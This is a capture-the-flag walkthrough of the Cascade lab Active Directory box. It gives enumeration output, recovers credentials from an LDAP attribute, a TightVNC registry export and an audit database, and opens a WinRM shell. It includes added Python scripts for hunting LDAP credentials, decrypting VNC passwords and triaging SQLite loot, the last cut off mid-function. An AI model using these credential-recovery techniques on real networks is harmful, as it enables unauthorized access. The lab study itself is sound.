NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 15:37 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:37
Completed NSE at 15:37, 0.00s elapsed
Initiating NSE at 15:37
Completed NSE at 15:37, 0.00s elapsed
Initiating NSE at 15:37
Completed NSE at 15:37, 0.00s elapsed
Initiating Ping Scan at 15:37
Scanning 10.10.10.182 [4 ports]
Completed Ping Scan at 15:37, 0.66s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:37
Completed Parallel DNS resolution of 1 host. at 15:37, 0.36s elapsed
Initiating SYN Stealth Scan at 15:37
Scanning 10.10.10.182 [1000 ports]
Discovered open port 53/tcp on 10.10.10.182
Discovered open port 139/tcp on 10.10.10.182
Discovered open port 445/tcp on 10.10.10.182
Discovered open port 135/tcp on 10.10.10.182
Discovered open port 49157/tcp on 10.10.10.182
Discovered open port 49158/tcp on 10.10.10.182
Discovered open port 636/tcp on 10.10.10.182
Discovered open port 49165/tcp on 10.10.10.182
Discovered open port 3268/tcp on 10.10.10.182
Discovered open port 3269/tcp on 10.10.10.182
Discovered open port 389/tcp on 10.10.10.182
Discovered open port 49155/tcp on 10.10.10.182
Discovered open port 88/tcp on 10.10.10.182
Discovered open port 49154/tcp on 10.10.10.182
Completed SYN Stealth Scan at 15:38, 26.61s elapsed (1000 total ports)
Initiating Service scan at 15:38
Scanning 14 services on 10.10.10.182
Completed Service scan at 15:39, 60.12s elapsed (14 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.182
Retrying OS detection (try #2) against 10.10.10.182
Initiating Traceroute at 15:39
Completed Traceroute at 15:39, 0.43s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:39
Completed Parallel DNS resolution of 2 hosts. at 15:39, 0.40s elapsed
NSE: Script scanning 10.10.10.182.
Initiating NSE at 15:39
Completed NSE at 15:40, 40.10s elapsed
Initiating NSE at 15:40
Completed NSE at 15:42, 122.25s elapsed
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
Nmap scan report for 10.10.10.182
Host is up (0.36s latency).
Not shown: 986 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-25 10:13:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.254 days (since Thu Jun 25 09:36:50 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 5m01s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-25T10:14:28
|_ start_date: 2020-06-25T04:12:26
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 411.99 ms 10.10.14.1
2 411.97 ms 10.10.10.182
NSE: Script Post-scanning.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 259.33 seconds
Raw packets sent: 2085 (95.424KB) | Rcvd: 71 (5.040KB)
ENUMERATION PART
The port set (DNS, Kerberos, LDAP and LDAPS, the global catalog on 3268/3269, SMB and RPC) marks 10.10.10.182 as the domain controller CASC-DC1 for cascade.local, running Windows Server 2008 R2 SP1. SMB signing is required, so relaying NTLM to this host is not an option; the next steps are null-session SMB/RPC and anonymous LDAP.
SMB ANONYMOUS LOGIN ENUMERATION:
┌─[root@liquid]─[~/Desktop/HTB/cascadeC]
└──╼ #smbclient -L 10.10.10.182
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
RPCCLIENT NULL-SESSION ENUMERATION:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
└──╼ #rpcclient -U "" 10.10.10.182
Enter WORKGROUP\'s password:
rpcclient $> enum
enumalsgroups enumdomains enumdrivers enumkey enumprinters enumprocs
enumdata enumdomgroups enumforms enummonitors enumprivs enumtrust
enumdataex enumdomusers enumjobs enumports enumprocdatatypes
rpcclient $> enumdomains
name:[CASCADE] idx:[0x0]
name:[Builtin] idx:[0x0]
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[DnsUpdateProxy] rid:[0x44f]
rpcclient $>
The null session gives us the domain name (CASCADE), the full user list and the domain groups. Two of the users, arksvc and BackupSvc, look like service accounts and are worth keeping in mind.
LDAP ENUMERATION:
nmap -p 389 --script "ldap-*" 10.10.10.182
┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
└──╼ #ldapsearch -h 10.10.10.182 -x -s sub -b "DC=cascade,DC=local"
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
The last attribute, cascadeLegacyPwd, is not part of the default AD schema and holds a base64 string. Note the single colon: LDIF writes binary values with a double colon (as it does for objectGUID and objectSid above), so this base64 was stored as text by whatever application set the attribute. Decoding it: clk0bjVldmE= : rY4n5eva
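Reading a full LDAP dump by eye for one odd attribute does not scale. Below is an added example, not from the original post: a Python script that parses ldapsearch output, reports attributes that are outside the standard AD user set (schema extensions like cascadeLegacyPwd) or that are free-text fields admins commonly leave passwords in, and base64-decodes any flagged value that is really text. The embedded LDIF is a constructed, trimmed copy of the entry above plus one hypothetical account; the standard-attribute list and the script name are my own choices.

```python
"""Hunt an ldapsearch (LDIF) dump for attributes likely to hold credentials.

Added example for this walkthrough, not from the original post or any tool it uses.
It flags attributes outside the standard AD user set (schema extensions such as
cascadeLegacyPwd) and free-text fields admins abuse for passwords, then base64-decodes
any flagged value that is really plain text. SAMPLE_LDIF is a constructed, trimmed copy
of the r.thompson entry above plus one hypothetical entry. Real use: ldif_hunt.py dump.ldif
"""
import base64
import re
import sys

# Attributes every AD user object carries; anything outside this set is worth a look.
STANDARD_USER_ATTRS = {
    "objectClass", "cn", "sn", "givenName", "distinguishedName", "instanceType", "name",
    "whenCreated", "whenChanged", "displayName", "uSNCreated", "uSNChanged", "memberOf",
    "objectGUID", "objectSid", "userAccountControl", "badPwdCount", "badPasswordTime",
    "codePage", "countryCode", "lastLogoff", "lastLogon", "pwdLastSet", "primaryGroupID",
    "accountExpires", "logonCount", "sAMAccountName", "sAMAccountType", "userPrincipalName",
    "objectCategory", "dSCorePropagationData", "lastLogonTimestamp", "description", "info",
    "msDS-SupportedEncryptionTypes",
}
ALWAYS_REVIEW = {"description", "info", "comment"}  # standard, but a classic password dump
B64_TEXT = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

SAMPLE_LDIF = """\
# Ryan Thompson, Users, UK, cascade.local (trimmed from the dump above)
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
distinguishedName: CN=Ryan Thompson,OU=Users,
 OU=UK,DC=cascade,DC=local
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
sAMAccountName: r.thompson
cascadeLegacyPwd: clk0bjVldmE=

# hypothetical second entry, constructed for this example
dn: CN=Example Contractor,OU=Users,OU=UK,DC=cascade,DC=local
sAMAccountName: e.contractor
description: temp account, ask IT for the password
"""


def unfold(text):
    """Join LDIF continuation lines, which start with a single space."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text):
    """Entries as {attribute: [(value, ldif_b64)]}. ldif_b64 marks 'attr:: value', LDIF's
    own encoding of binary data; base64 after a single colon came from the application."""
    entries, entry = [], {}
    for line in unfold(text):
        if not line.strip():
            if entry:
                entries.append(entry)
                entry = {}
            continue
        if line.startswith("#"):
            continue
        name, sep, value = line.partition(":")
        if not sep:
            continue
        ldif_b64 = value.startswith(":")
        value = value[1:].strip() if ldif_b64 else value.strip()
        entry.setdefault(name.strip(), []).append((value, ldif_b64))
    if entry:
        entries.append(entry)
    return entries


def decode_if_text(value):
    """Base64-decode value and return it only if the result is printable ASCII."""
    if len(value) % 4 or not B64_TEXT.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return text if text and text.isprintable() else None


def find_suspicious_attributes(text):
    """One hit per value of every non-standard or free-text attribute."""
    hits = []
    for entry in parse_ldif(text):
        dn = entry.get("dn", [("<no dn>", False)])[0][0]
        for name, values in entry.items():
            reason = ("non-standard attribute" if name not in STANDARD_USER_ATTRS
                      else "free-text attribute" if name in ALWAYS_REVIEW else None)
            if name == "dn" or reason is None:
                continue
            for value, ldif_b64 in values:
                hits.append({"dn": dn, "attribute": name, "value": value, "reason": reason,
                             "decoded": None if ldif_b64 else decode_if_text(value)})
    return hits


if __name__ == "__main__":
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_LDIF
    for h in find_suspicious_attributes(text):
        print(f"[{h['reason']}] {h['dn']}\n    {h['attribute']}: {h['value']} -> {h['decoded']}")
```

Against the sample it reports cascadeLegacyPwd on Ryan Thompson decoded to rY4n5eva and the contractor's description for manual review; objectGUID is skipped because its double-colon value is LDIF's own binary encoding, not something the application chose.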
ENUMERATION AFTER LOGINS
So far we have the user list and a candidate password for r.thompson (rY4n5eva). I try it against SMB and WinRM:
RYAN : SMBCLIENT
┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
└──╼ #smbclient -U "r.thompson" -L 10.10.10.182
Enter WORKGROUP\r.thompson's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Audit$ Disk
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
┌─[root@liquid]─[~/Desktop/HTB/cascadeC]
└──╼ #
RYAN : EVIL-WINRM
┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
└──╼ #evil-winrm -u r.thompson -p rY4n5eva -i 10.10.10.182
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
WinRM rejects the login, most likely because r.thompson is not in Remote Management Users (the LDAP entry lists only IT under memberOf), but the SMB login works and shows the Data share, so we pull everything r.thompson can read from it.
┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascade]
└──╼ #smbclient -U 'r.thompson' \\\\10.10.10.182\\Data
Enter WORKGROUP\r.thompson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 27 08:57:34 2020
.. D 0 Mon Jan 27 08:57:34 2020
Contractors D 0 Mon Jan 13 07:15:11 2020
Finance D 0 Mon Jan 13 07:15:06 2020
IT D 0 Tue Jan 28 23:34:51 2020
Production D 0 Mon Jan 13 07:15:18 2020
Temps D 0 Mon Jan 13 07:15:15 2020
13106687 blocks of size 4096. 7798117 blocks available
smb: \> cd IT
smb: \IT\> recurse ON
smb: \IT\> mget *
Get directory Email Archives? yes
Get file Meeting_Notes_June_2018.html? yes
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
Get directory LogonAudit? yes
Get directory Logs? yes
Get directory Ark AD Recycle Bin? yes
Get file ArkAdRecycleBin.log? yes
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (0.6 KiloBytes/sec) (average 0.8 KiloBytes/sec)
Get directory DCs? yes
Get file dcdiag.log? yes
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as dcdiag.log (2.8 KiloBytes/sec) (average 1.4 KiloBytes/sec)
Get directory Temp? yes
Get directory r.thompson? yes
Get directory s.smith? yes
Get file VNC Install.reg? yes
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (2.0 KiloBytes/sec) (average 1.5 KiloBytes/sec)
That downloads everything readable under IT; the other top-level folders in Data (Contractors, Finance, Production, Temps) are not accessible to r.thompson. Two files matter: Meeting_Notes_June_2018.html under Email Archives, which is worth reading, and VNC Install.reg under Temp\s.smith, a TightVNC server registry export that contains the VNC password as a hex value:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
The interesting key is "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f. TightVNC does not hash the password: the value is the plaintext DES-encrypted with a fixed key that is hard-coded in every VNC implementation, so anyone who can read the registry value (or this export lying in a share) can recover it. A ready-made recipe is at https://github.com/frizb/PasswordDecrypts:
s.smith : 6bcf2a4b6e5aca0f : sT333ve2
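The same recovery as an added example, not from the original post and not the PasswordDecrypts code linked above: a Python script that parses the registry value and runs the fixed-key DES decryption. The key is the public VNC constant written in standard DES bit order; the DES implementation comes from whichever of pycryptodome, cryptography or the openssl command line is installed (the latter two use 3DES with the 8-byte key repeated three times, which is mathematically plain DES).

```python
"""Recover a VNC server password from the registry value in a .reg export.

Added example for this walkthrough, not from the original post and not the
PasswordDecrypts code linked above. TightVNC, RealVNC and UltraVNC do not hash
the password: they DES-encrypt the NUL-padded, 8-byte password with a fixed
key hard-coded in every VNC build, so the value is reversible by anyone who can
read it. VNC_FIXED_KEY is that public constant in standard DES bit order.
Decryption uses whichever DES implementation is installed: pycryptodome,
cryptography (3DES with the 8-byte key repeated, which is plain DES), or the
openssl command line as a last resort.
"""
import subprocess

VNC_FIXED_KEY = bytes.fromhex("e84ad660c4721ae0")


def _des_ecb_decrypt(key, block):
    """Single-block DES decryption via the first available backend."""
    try:  # pycryptodome (or the old pycrypto): plain single DES
        from Crypto.Cipher import DES
        return DES.new(key, DES.MODE_ECB).decrypt(block)
    except ImportError:
        pass
    try:  # cryptography: 3DES with K1 == K2 == K3 collapses to single DES
        try:
            from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
        except ImportError:
            from cryptography.hazmat.primitives.ciphers.algorithms import TripleDES
        from cryptography.hazmat.primitives.ciphers import Cipher, modes
        dec = Cipher(TripleDES(key * 3), modes.ECB()).decryptor()
        return dec.update(block) + dec.finalize()
    except ImportError:
        pass
    # openssl CLI: same repeated-key 3DES trick; a zero IV makes CBC equal ECB for one block
    return subprocess.run(
        ["openssl", "enc", "-d", "-des-ede3-cbc", "-K", (key * 3).hex(),
         "-iv", "00" * 8, "-nopad"],
        input=block, capture_output=True, check=True).stdout


def parse_reg_hex(value):
    """Turn 'hex:6b,cf,...' (or bare '6bcf...') from a .reg file into bytes."""
    value = value.strip()
    if value.lower().startswith("hex:"):
        value = value[4:]
    return bytes.fromhex(value.replace(",", "").replace(" ", ""))


def vnc_decrypt(reg_value):
    """Decrypt a VNC 'Password' registry value and return the plaintext."""
    data = parse_reg_hex(reg_value)
    if len(data) != 8:
        raise ValueError(f"expected one 8-byte DES block, got {len(data)} bytes")
    plain = _des_ecb_decrypt(VNC_FIXED_KEY, data)
    return plain.rstrip(b"\0").decode("latin-1")


if __name__ == "__main__":
    # the value from VNC Install.reg above
    print(vnc_decrypt("hex:6b,cf,2a,4b,6e,5a,ca,0f"))
```

The length check is deliberate: VNC truncates passwords to 8 characters, which is why the stored value is always exactly one DES block, and a longer blob means you are looking at something other than a VNC password.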
GETTING USER ACCESS
┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascade]
└──╼ #evil-winrm -u s.smith -p sT333ve2 -i 10.10.10.182
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> ls
*Evil-WinRM* PS C:\Users\s.smith\Documents> cd ..
*Evil-WinRM* PS C:\Users\s.smith> cd Desktop
*Evil-WinRM* PS C:\Users\s.smith\Desktop> dir
Directory: C:\Users\s.smith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/25/2020 5:16 AM 34 user.txt
-a---- 3/25/2020 11:17 AM 1031 WinDirStat.lnk
*Evil-WinRM* PS C:\Users\s.smith\Desktop> type user.txt
ed6c4b7931a5cb041cc4c5090a1efdca
*Evil-WinRM* PS C:\Users\s.smith\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\s.smith\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=============== ==============================================
cascade\s.smith S-1-5-21-3332504370-1206983947-1165150453-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Audit Share Alias S-1-5-21-3332504370-1206983947-1165150453-1137 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\s.smith\Desktop>
That is the user flag. s.smith has only the default user privileges; the group list is what matters: Audit Share, Data Share, IT and Remote Management Users (which is why WinRM works for s.smith but not for r.thompson).
Next I go back to the SMB loot, starting with ArkAdRecycleBin.log from Data\IT\Logs\Ark AD Recycle Bin:
1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD] Validating settings...
1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD] Validating settings...
2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD] Validating settings...
8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0
So a service account, CASCADE\ArkSvc, runs the AD Recycle Bin Manager and has moved objects, including an account called TempAdmin, into the Deleted Objects container. arksvc also appeared in the rpcclient user list, so its password is the next target.
The Audit$ share, which s.smith can read through the Audit Share group, holds a SQLite file, Audit.db. It is binary, but strings shows the text inside it:
┌─[root@liquid]─[~/Desktop/HTB/cascade]
└──╼ #strings Audit.db
SQLite format 3
<---->
j.allenJoseph Allen
BackupSvcBackupSvc
d.burmanDavid Burman
b.hans
?dddddddd
DEL:f9bfa86b-d7ab-4561-b4b3-dbb1edb51f49CN=dddd\0ADEL:f9bfa86b-d7ab-4561-b4b3-dbb1edb51f49,CN=Deleted Objects,DC=cascade,DC=local
ITempAdminTempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188aCN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
?tempTemp
DEL:83cb74b3-2958-45d0-90f0-72d46a4abddcCN=Temp\0ADEL:83cb74b3-2958-45d0-90f0-72d46a4abddc,CN=Deleted Objects,DC=cascade,DC=local
Mdeleteddeleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deefCN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
?testTest
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6dCN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
='ArkSvcBQO5l5Kj9MdErXx6Q6AGOw==cascade.local
sqlb_temp_table_
DeletedUserAudit
Ldap
dddddddd
DEL:f9bfa86b-d7ab-45
dddddddd
<------>
Next to ArkSvc there is a base64 string, BQO5l5Kj9MdErXx6Q6AGOw==. It is neither a hash nor an encoded plaintext: it decodes to 16 bytes of non-printable data, i.e. ciphertext, so it has to be decrypted rather than decoded. The snippet at https://dotnetfiddle.net/G2eVVb does that:
arksvc : BQO5l5Kj9MdErXx6Q6AGOw== : w3lc0meFr31nd
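strings works, but it throws away the structure. The following added example (not from the original post) opens the database with Python's sqlite3 module instead, dumps every table with its column names, and classifies base64-looking cells as plain text, base64 of printable text, or base64 of raw bytes; the last category is exactly what the ArkSvc value turns out to be. The in-memory sample it builds is a constructed stand-in for Audit.db: the table names come from the strings output above, the column names and row layout are assumptions.

```python
"""Dump a SQLite loot file properly and classify base64-looking cells.

Added example, not from the original post. The walkthrough ran `strings` over
Audit.db; querying it instead keeps the column names, which is what tells you
that the base64 blob sits next to a username and a domain in a password column.
build_sample_db() constructs an in-memory stand-in: the table names match the
strings output above, the column names and row layout are assumptions.
Real use: python3 sqlite_loot.py Audit.db
"""
import base64
import re
import sqlite3
import sys

B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
SECRET_COLUMN = re.compile(r"pwd|pass|secret|key|hash", re.I)


def classify(cell):
    """Return (kind, shown): plain text, base64 of printable text, or base64 of raw
    bytes. Raw bytes are ciphertext or a digest, not an encoded password, so they
    need the writer's key (or a known hash format) rather than a decoder."""
    if not isinstance(cell, str) or len(cell) < 8 or len(cell) % 4 or not B64.match(cell):
        return "text", cell
    try:
        raw = base64.b64decode(cell, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return "text", cell
    if all(32 <= b < 127 for b in raw):
        return "base64-text", raw.decode("ascii")
    return "base64-binary", f"{len(raw)} bytes, hex {raw.hex()}"


def dump_tables(conn):
    """{table: (columns, rows)} for every user table in the database."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    out = {}
    for name in tables:
        cur = conn.execute(f'SELECT * FROM "{name}"')
        out[name] = ([d[0] for d in cur.description], cur.fetchall())
    return out


def find_secrets(conn):
    """Every cell in a password-looking column, with its classification."""
    hits = []
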